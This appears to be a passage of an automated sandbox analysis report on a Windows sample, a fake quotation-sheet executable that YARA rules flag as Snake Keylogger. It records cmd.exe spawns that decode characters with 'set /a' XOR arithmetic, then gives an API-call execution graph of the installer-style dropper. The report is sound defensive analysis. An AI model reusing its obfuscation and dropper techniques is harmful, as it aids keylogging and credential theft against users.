                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:112
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "133^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:113
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:114
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:115
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:116
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:117
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:118
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:119
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:120
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:121
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:122
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:123
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:124
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:125
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:126
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:127
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:128
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:129
                                                                              Start time:08:44:47
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:131
                                                                              Start time:08:45:18
                                                                              Start date:24/07/2024
                                                                              Path:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'009'096 bytes
                                                                              MD5 hash:CFB41760F84E1E70BADE0CA7394D424B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:19.6%
                                                                                Dynamic/Decrypted Code Coverage:14.2%
                                                                                Signature Coverage:20.4%
                                                                                Total number of Nodes:1488
                                                                                Total number of Limit Nodes:35
                                                                                execution_graph 4890 10001000 4893 1000101b 4890->4893 4900 100014bb 4893->4900 4895 10001020 4896 10001027 GlobalAlloc 4895->4896 4897 10001024 4895->4897 4896->4897 4898 100014e2 3 API calls 4897->4898 4899 10001019 4898->4899 4902 100014c1 4900->4902 4901 100014c7 4901->4895 4902->4901 4903 100014d3 GlobalFree 4902->4903 4903->4895 4904 401cc2 4905 402a1d 18 API calls 4904->4905 4906 401cd2 SetWindowLongA 4905->4906 4907 4028cf 4906->4907 4908 401a43 4909 402a1d 18 API calls 4908->4909 4910 401a49 4909->4910 4911 402a1d 18 API calls 4910->4911 4912 4019f3 4911->4912 3882 401e44 3898 402a3a 3882->3898 3888 401e5a 3889 401eb0 CloseHandle 3888->3889 3890 401e79 WaitForSingleObject 3888->3890 3891 4026a6 3888->3891 3918 406238 3888->3918 3889->3891 3890->3888 3892 401e87 GetExitCodeProcess 3890->3892 3894 401ea4 3892->3894 3895 401e99 3892->3895 3894->3889 3896 401ea2 3894->3896 3922 405dc1 wsprintfA 3895->3922 3896->3889 3899 402a46 3898->3899 3923 405e85 3899->3923 3902 401e4a 3904 40507c 3902->3904 3905 405097 3904->3905 3914 401e54 3904->3914 3906 4050b4 lstrlenA 3905->3906 3909 405e85 18 API calls 3905->3909 3907 4050c2 lstrlenA 3906->3907 3908 4050dd 3906->3908 3910 4050d4 lstrcatA 3907->3910 3907->3914 3911 4050f0 3908->3911 3912 4050e3 SetWindowTextA 3908->3912 3909->3906 3910->3908 3913 4050f6 SendMessageA SendMessageA SendMessageA 3911->3913 3911->3914 3912->3911 3913->3914 3915 4055f4 CreateProcessA 3914->3915 3916 405633 3915->3916 3917 405627 CloseHandle 3915->3917 3916->3888 3917->3916 3919 406255 PeekMessageA 3918->3919 3920 406265 3919->3920 3921 40624b DispatchMessageA 3919->3921 3920->3890 3921->3919 3922->3896 3928 405e92 3923->3928 3924 4060b5 3925 402a67 3924->3925 3957 405e63 lstrcpynA 3924->3957 3925->3902 3941 4060ce 3925->3941 3927 405f33 GetVersion 3927->3928 3928->3924 3928->3927 3929 40608c lstrlenA 3928->3929 3932 405e85 10 API calls 3928->3932 3934 405fab GetSystemDirectoryA 3928->3934 3935 405fbe GetWindowsDirectoryA 3928->3935 3936 4060ce 5 API calls 3928->3936 3937 405ff2 SHGetSpecialFolderLocation 3928->3937 3938 405e85 10 API calls 3928->3938 3939 406035 lstrcatA 3928->3939 3950 405d4a RegOpenKeyExA 3928->3950 3955 405dc1 wsprintfA 3928->3955 3956 405e63 lstrcpynA 3928->3956 3929->3928 3932->3929 3934->3928 3935->3928 3936->3928 3937->3928 3940 40600a SHGetPathFromIDListA CoTaskMemFree 3937->3940 3938->3928 3939->3928 3940->3928 3948 4060da 3941->3948 3942 406142 3943 406146 CharPrevA 3942->3943 3945 406161 3942->3945 3943->3942 3944 406137 CharNextA 3944->3942 3944->3948 3945->3902 3947 406125 CharNextA 3947->3948 3948->3942 3948->3944 3948->3947 3949 406132 CharNextA 3948->3949 3958 405900 3948->3958 3949->3944 3951 405dbb 3950->3951 3952 405d7d RegQueryValueExA 3950->3952 3951->3928 3953 405d9e RegCloseKey 3952->3953 3953->3951 3955->3928 3956->3928 3957->3925 3959 405906 3958->3959 3960 405919 3959->3960 3961 40590c CharNextA 3959->3961 3960->3948 3961->3959 4913 402644 4914 40264a 4913->4914 4915 402652 FindClose 4914->4915 4916 4028cf 4914->4916 4915->4916 4917 4026c6 4918 402a3a 18 API calls 4917->4918 4919 4026d4 4918->4919 4920 4026ea 4919->4920 4921 402a3a 18 API calls 4919->4921 4922 405ab1 2 API calls 4920->4922 4921->4920 4923 4026f0 4922->4923 4945 405ad6 GetFileAttributesA CreateFileA 4923->4945 4925 4026fd 4926 4027a0 4925->4926 4927 402709 GlobalAlloc 4925->4927 4928 4027a8 DeleteFileA 4926->4928 4929 4027bb 4926->4929 4930 402722 4927->4930 4931 402797 CloseHandle 4927->4931 4928->4929 4946 4031e3 SetFilePointer 4930->4946 4931->4926 4933 402728 4934 4031cd ReadFile 4933->4934 4935 402731 GlobalAlloc 4934->4935 4936 402741 4935->4936 4937 402775 4935->4937 4938 402f5c 45 API calls 4936->4938 4939 405b7d WriteFile 4937->4939 4940 40274e 4938->4940 4941 402781 GlobalFree 4939->4941 4943 40276c GlobalFree 4940->4943 4942 402f5c 45 API calls 4941->4942 4944 402794 4942->4944 4943->4937 4944->4931 4945->4925 4946->4933 4947 4022c7 4948 402a3a 18 API calls 4947->4948 4949 4022d8 4948->4949 4950 402a3a 18 API calls 4949->4950 4951 4022e1 4950->4951 4952 402a3a 18 API calls 4951->4952 4953 4022eb GetPrivateProfileStringA 4952->4953 4187 1000270b 4188 1000275b 4187->4188 4189 1000271b VirtualProtect 4187->4189 4189->4188 4957 1000180d 4958 10001830 4957->4958 4959 10001860 GlobalFree 4958->4959 4960 10001872 4958->4960 4959->4960 4961 10001266 2 API calls 4960->4961 4962 100019e3 GlobalFree GlobalFree 4961->4962 4963 40674d 4964 406332 4963->4964 4965 406c9d 4964->4965 4966 4063b3 GlobalFree 4964->4966 4967 4063bc GlobalAlloc 4964->4967 4968 406433 GlobalAlloc 4964->4968 4969 40642a GlobalFree 4964->4969 4966->4967 4967->4964 4967->4965 4968->4964 4968->4965 4969->4968 4650 401751 4651 402a3a 18 API calls 4650->4651 4652 401758 4651->4652 4653 401776 4652->4653 4654 40177e 4652->4654 4690 405e63 lstrcpynA 4653->4690 4691 405e63 lstrcpynA 4654->4691 4657 40177c 4661 4060ce 5 API calls 4657->4661 4658 401789 4659 4058d5 3 API calls 4658->4659 4660 40178f lstrcatA 4659->4660 4660->4657 4687 40179b 4661->4687 4662 406167 2 API calls 4662->4687 4663 4017dc 4664 405ab1 2 API calls 4663->4664 4664->4687 4666 4017b2 CompareFileTime 4666->4687 4667 401876 4669 40507c 25 API calls 4667->4669 4668 40184d 4670 40507c 25 API calls 4668->4670 4678 401862 4668->4678 4671 401880 4669->4671 4670->4678 4672 402f5c 45 API calls 4671->4672 4674 401893 4672->4674 4673 405e63 lstrcpynA 4673->4687 4675 4018a7 SetFileTime 4674->4675 4677 4018b9 FindCloseChangeNotification 4674->4677 4675->4677 4676 405e85 18 API calls 4676->4687 4677->4678 4679 4018ca 4677->4679 4680 4018e2 4679->4680 4681 4018cf 4679->4681 4682 405e85 18 API calls 4680->4682 4683 405e85 18 API calls 4681->4683 4684 4018ea 4682->4684 4686 4018d7 lstrcatA 4683->4686 4688 405659 MessageBoxIndirectA 4684->4688 4685 405659 MessageBoxIndirectA 4685->4687 4686->4684 4687->4662 4687->4663 4687->4666 4687->4667 4687->4668 4687->4673 4687->4676 4687->4685 4689 405ad6 GetFileAttributesA CreateFileA 4687->4689 4688->4678 4689->4687 4690->4657 4691->4658 4970 401651 4971 402a3a 18 API calls 4970->4971 4972 401657 4971->4972 4973 406167 2 API calls 4972->4973 4974 40165d 4973->4974 4975 401951 4976 402a1d 18 API calls 4975->4976 4977 401958 4976->4977 4978 402a1d 18 API calls 4977->4978 4979 401962 4978->4979 4980 402a3a 18 API calls 4979->4980 4981 40196b 4980->4981 4982 40197e lstrlenA 4981->4982 4984 4019b9 4981->4984 4983 401988 4982->4983 4983->4984 4988 405e63 lstrcpynA 4983->4988 4986 4019a2 4986->4984 4987 4019af lstrlenA 4986->4987 4987->4984 4988->4986 4692 4021d2 4693 402a3a 18 API calls 4692->4693 4694 4021d8 4693->4694 4695 402a3a 18 API calls 4694->4695 4696 4021e1 4695->4696 4697 402a3a 18 API calls 4696->4697 4698 4021ea 4697->4698 4699 406167 2 API calls 4698->4699 4700 4021f3 4699->4700 4701 402204 lstrlenA lstrlenA 4700->4701 4705 4021f7 4700->4705 4703 40507c 25 API calls 4701->4703 4702 40507c 25 API calls 4706 4021ff 4702->4706 4704 402240 SHFileOperationA 4703->4704 4704->4705 4704->4706 4705->4702 4705->4706 4989 4019d2 4990 402a3a 18 API calls 4989->4990 4991 4019d9 4990->4991 4992 402a3a 18 API calls 4991->4992 4993 4019e2 4992->4993 4994 4019e9 lstrcmpiA 4993->4994 4995 4019fb lstrcmpA 4993->4995 4996 4019ef 4994->4996 4995->4996 4997 402254 4998 40225b 4997->4998 5001 40226e 4997->5001 4999 405e85 18 API calls 4998->4999 5000 402268 4999->5000 5002 405659 MessageBoxIndirectA 5000->5002 5002->5001 5003 4014d6 5004 402a1d 18 API calls 5003->5004 5005 4014dc Sleep 5004->5005 5007 4028cf 5005->5007 5008 4047d7 5009 404803 5008->5009 5010 4047e7 5008->5010 5012 404836 5009->5012 5013 404809 SHGetPathFromIDListA 5009->5013 5019 40563d GetDlgItemTextA 5010->5019 5015 404819 5013->5015 5018 404820 SendMessageA 5013->5018 5014 4047f4 SendMessageA 5014->5009 5016 40140b 2 API calls 5015->5016 5016->5018 5018->5012 5019->5014 5020 1000161a 5021 10001649 5020->5021 5022 10001a5d 18 API calls 5021->5022 5023 10001650 5022->5023 5024 10001663 5023->5024 5025 10001657 5023->5025 5027 1000168a 5024->5027 5028 1000166d 5024->5028 5026 10001266 2 API calls 5025->5026 5035 10001661 5026->5035 5030 10001690 5027->5030 5031 100016b4 5027->5031 5029 100014e2 3 API calls 5028->5029 5033 10001672 5029->5033 5034 10001559 3 API calls 5030->5034 5032 100014e2 3 API calls 5031->5032 5032->5035 5036 10001559 3 API calls 5033->5036 5037 10001695 5034->5037 5038 10001678 5036->5038 5039 10001266 2 API calls 5037->5039 5040 10001266 2 API calls 5038->5040 5041 1000169b GlobalFree 5039->5041 5043 1000167e GlobalFree 5040->5043 5041->5035 5042 100016af GlobalFree 5041->5042 5042->5035 5043->5035 5044 40155b 5045 402877 5044->5045 5048 405dc1 wsprintfA 5045->5048 5047 40287c 5048->5047 4874 40255c 4875 402a1d 18 API calls 4874->4875 4881 402566 4875->4881 4876 4025d0 4877 405b4e ReadFile 4877->4881 4878 4025d2 4883 405dc1 wsprintfA 4878->4883 4880 4025e2 4880->4876 4882 4025f8 SetFilePointer 4880->4882 4881->4876 4881->4877 4881->4878 4881->4880 4882->4876 4883->4876 5049 40415c lstrcpynA lstrlenA 5050 40205e 5051 402a3a 18 API calls 5050->5051 5052 402065 5051->5052 5053 402a3a 18 API calls 5052->5053 5054 40206f 5053->5054 5055 402a3a 18 API calls 5054->5055 5056 402079 5055->5056 5057 402a3a 18 API calls 5056->5057 5058 402083 5057->5058 5059 402a3a 18 API calls 5058->5059 5060 40208d 5059->5060 5061 4020cc CoCreateInstance 5060->5061 5062 402a3a 18 API calls 5060->5062 5065 4020eb 5061->5065 5067 402193 5061->5067 5062->5061 5063 401423 25 API calls 5064 4021c9 5063->5064 5066 402173 MultiByteToWideChar 5065->5066 5065->5067 5066->5067 5067->5063 5067->5064 5068 40265e 5069 402664 5068->5069 5070 402668 FindNextFileA 5069->5070 5072 40267a 5069->5072 5071 4026b9 5070->5071 5070->5072 5074 405e63 lstrcpynA 5071->5074 5074->5072 5075 401cde GetDlgItem GetClientRect 5076 402a3a 18 API calls 5075->5076 5077 401d0e LoadImageA SendMessageA 5076->5077 5078 401d2c DeleteObject 5077->5078 5079 4028cf 5077->5079 5078->5079 5080 401662 5081 402a3a 18 API calls 5080->5081 5082 401669 5081->5082 5083 402a3a 18 API calls 5082->5083 5084 401672 5083->5084 5085 402a3a 18 API calls 5084->5085 5086 40167b MoveFileA 5085->5086 5087 401687 5086->5087 5088 40168e 5086->5088 5090 401423 25 API calls 5087->5090 5089 406167 2 API calls 5088->5089 5092 4021c9 5088->5092 5091 40169d 5089->5091 5090->5092 5091->5092 5093 405d1e 38 API calls 5091->5093 5093->5087 3962 402364 3963 40236a 3962->3963 3964 402a3a 18 API calls 3963->3964 3965 40237c 3964->3965 3966 402a3a 18 API calls 3965->3966 3967 402386 RegCreateKeyExA 3966->3967 3969 4023b0 3967->3969 3978 4026a6 3967->3978 3968 4023c8 3970 4023d4 3968->3970 3979 402a1d 3968->3979 3969->3968 3971 402a3a 18 API calls 3969->3971 3973 4023ef RegSetValueExA 3970->3973 3982 402f5c 3970->3982 3974 4023c1 lstrlenA 3971->3974 3976 402405 RegCloseKey 3973->3976 3974->3968 3976->3978 3980 405e85 18 API calls 3979->3980 3981 402a31 3980->3981 3981->3970 3983 402f87 3982->3983 3984 402f6b SetFilePointer 3982->3984 3997 403064 GetTickCount 3983->3997 3984->3983 3989 403064 43 API calls 3990 402fbe 3989->3990 3991 40302a ReadFile 3990->3991 3994 402fcd 3990->3994 3996 403024 3990->3996 3991->3996 3993 405b4e ReadFile 3993->3994 3994->3993 3994->3996 4012 405b7d WriteFile 3994->4012 3996->3973 3998 403092 3997->3998 3999 4031bc 3997->3999 4014 4031e3 SetFilePointer 3998->4014 4000 402c17 33 API calls 3999->4000 4003 402f8e 4000->4003 4002 40309d SetFilePointer 4005 4030c2 4002->4005 4003->3996 4010 405b4e ReadFile 4003->4010 4005->4003 4008 405b7d WriteFile 4005->4008 4009 40319d SetFilePointer 4005->4009 4015 4031cd 4005->4015 4018 4062ff 4005->4018 4025 402c17 4005->4025 4008->4005 4009->3999 4011 402fa7 4010->4011 4011->3989 4011->3996 4013 405b9b 4012->4013 4013->3994 4014->4002 4016 405b4e ReadFile 4015->4016 4017 4031e0 4016->4017 4017->4005 4019 406324 4018->4019 4020 40632c 4018->4020 4019->4005 4020->4019 4021 4063b3 GlobalFree 4020->4021 4022 4063bc GlobalAlloc 4020->4022 4023 406433 GlobalAlloc 4020->4023 4024 40642a GlobalFree 4020->4024 4021->4022 4022->4019 4022->4020 4023->4019 4023->4020 4024->4023 4026 402c25 4025->4026 4027 402c3d 4025->4027 4028 402c2e DestroyWindow 4026->4028 4033 402c35 4026->4033 4029 402c45 4027->4029 4030 402c4d GetTickCount 4027->4030 4028->4033 4031 406238 2 API calls 4029->4031 4032 402c5b 4030->4032 4030->4033 4031->4033 4034 402c90 CreateDialogParamA ShowWindow 4032->4034 4035 402c63 4032->4035 4033->4005 4034->4033 4035->4033 4040 402bfb 4035->4040 4037 402c71 wsprintfA 4038 40507c 25 API calls 4037->4038 4039 402c8e 4038->4039 4039->4033 4041 402c0a 4040->4041 4042 402c0c MulDiv 4040->4042 4041->4042 4042->4037 5108 401567 5109 401577 ShowWindow 5108->5109 5110 40157e 5108->5110 5109->5110 5111 40158c ShowWindow 5110->5111 5112 4028cf 5110->5112 5111->5112 4043 401dea 4044 402a3a 18 API calls 4043->4044 4045 401df0 4044->4045 4046 402a3a 18 API calls 4045->4046 4047 401df9 4046->4047 4048 402a3a 18 API calls 4047->4048 4049 401e02 4048->4049 4050 402a3a 18 API calls 4049->4050 4051 401e0b 4050->4051 4055 401423 4051->4055 4054 401e3f 4056 40507c 25 API calls 4055->4056 4057 401431 ShellExecuteA 4056->4057 4057->4054 5120 401eee 5121 402a3a 18 API calls 5120->5121 5122 401ef5 5121->5122 5123 4061fc 5 API calls 5122->5123 5124 401f04 5123->5124 5125 401f1c GlobalAlloc 5124->5125 5126 401f84 5124->5126 5125->5126 5127 401f30 5125->5127 5128 4061fc 5 API calls 5127->5128 5129 401f37 5128->5129 5130 4061fc 5 API calls 5129->5130 5131 401f41 5130->5131 5131->5126 5135 405dc1 wsprintfA 5131->5135 5133 401f78 5136 405dc1 wsprintfA 5133->5136 5135->5133 5136->5126 5137 4014f0 SetForegroundWindow 5138 4028cf 5137->5138 5139 404ff0 5140 405000 5139->5140 5141 405014 5139->5141 5143 405006 5140->5143 5144 40505d 5140->5144 5142 40501c IsWindowVisible 5141->5142 5150 405033 5141->5150 5142->5144 5145 405029 5142->5145 5147 404094 SendMessageA 5143->5147 5146 405062 CallWindowProcA 5144->5146 5152 404947 SendMessageA 5145->5152 5149 405010 5146->5149 5147->5149 5150->5146 5157 4049c7 5150->5157 5153 4049a6 SendMessageA 5152->5153 5154 40496a GetMessagePos ScreenToClient SendMessageA 5152->5154 5156 40499e 5153->5156 5155 4049a3 5154->5155 5154->5156 5155->5153 5156->5150 5166 405e63 lstrcpynA 5157->5166 5159 4049da 5167 405dc1 wsprintfA 5159->5167 5161 4049e4 5162 40140b 2 API calls 5161->5162 5163 4049ed 5162->5163 5168 405e63 lstrcpynA 5163->5168 5165 4049f4 5165->5144 5166->5159 5167->5161 5168->5165 5169 100015b3 5170 100014bb GlobalFree 5169->5170 5172 100015cb 5170->5172 5171 10001611 GlobalFree 5172->5171 5173 100015e6 5172->5173 5174 100015fd VirtualFree 5172->5174 5173->5171 5174->5171 4727 403b75 4728 403cc8 4727->4728 4729 403b8d 4727->4729 4731 403d19 4728->4731 4732 403cd9 GetDlgItem GetDlgItem 4728->4732 4729->4728 4730 403b99 4729->4730 4734 403ba4 SetWindowPos 4730->4734 4735 403bb7 4730->4735 4733 403d73 4731->4733 4741 401389 2 API calls 4731->4741 4736 404048 19 API calls 4732->4736 4737 404094 SendMessageA 4733->4737 4757 403cc3 4733->4757 4734->4735 4738 403bd4 4735->4738 4739 403bbc ShowWindow 4735->4739 4740 403d03 SetClassLongA 4736->4740 4756 403d85 4737->4756 4742 403bf6 4738->4742 4743 403bdc DestroyWindow 4738->4743 4739->4738 4744 40140b 2 API calls 4740->4744 4747 403d4b 4741->4747 4745 403bfb SetWindowLongA 4742->4745 4746 403c0c 4742->4746 4796 403fd1 4743->4796 4744->4731 4745->4757 4748 403cb5 4746->4748 4749 403c18 GetDlgItem 4746->4749 4747->4733 4750 403d4f SendMessageA 4747->4750 4806 4040af 4748->4806 4753 403c2b SendMessageA IsWindowEnabled 4749->4753 4760 403c48 4749->4760 4750->4757 4751 40140b 2 API calls 4751->4756 4752 403fd3 DestroyWindow EndDialog 4752->4796 4753->4757 4753->4760 4755 404002 ShowWindow 4755->4757 4756->4751 4756->4752 4756->4757 4758 405e85 18 API calls 4756->4758 4763 404048 19 API calls 4756->4763 4787 403f13 DestroyWindow 4756->4787 4797 404048 4756->4797 4758->4756 4759 403c4d 4803 404021 4759->4803 4760->4759 4761 403c55 4760->4761 4764 403c9c SendMessageA 4760->4764 4765 403c68 4760->4765 4761->4759 4761->4764 4763->4756 4764->4748 4767 403c70 4765->4767 4768 403c85 4765->4768 4766 403c83 4766->4748 4770 40140b 2 API calls 4767->4770 4769 40140b 2 API calls 4768->4769 4771 403c8c 4769->4771 4770->4759 4771->4748 4771->4759 4773 403e00 GetDlgItem 4774 403e15 4773->4774 4775 403e1d ShowWindow KiUserCallbackDispatcher 4773->4775 4774->4775 4800 40406a KiUserCallbackDispatcher 4775->4800 4777 403e47 EnableWindow 4780 403e5b 4777->4780 4778 403e60 GetSystemMenu EnableMenuItem SendMessageA 4779 403e90 SendMessageA 4778->4779 4778->4780 4779->4780 4780->4778 4801 40407d SendMessageA 4780->4801 4802 405e63 lstrcpynA 4780->4802 4783 403ebe lstrlenA 4784 405e85 18 API calls 4783->4784 4785 403ecf SetWindowTextA 4784->4785 4786 401389 2 API calls 4785->4786 4786->4756 4788 403f2d CreateDialogParamA 4787->4788 4787->4796 4789 403f60 4788->4789 4788->4796 4790 404048 19 API calls 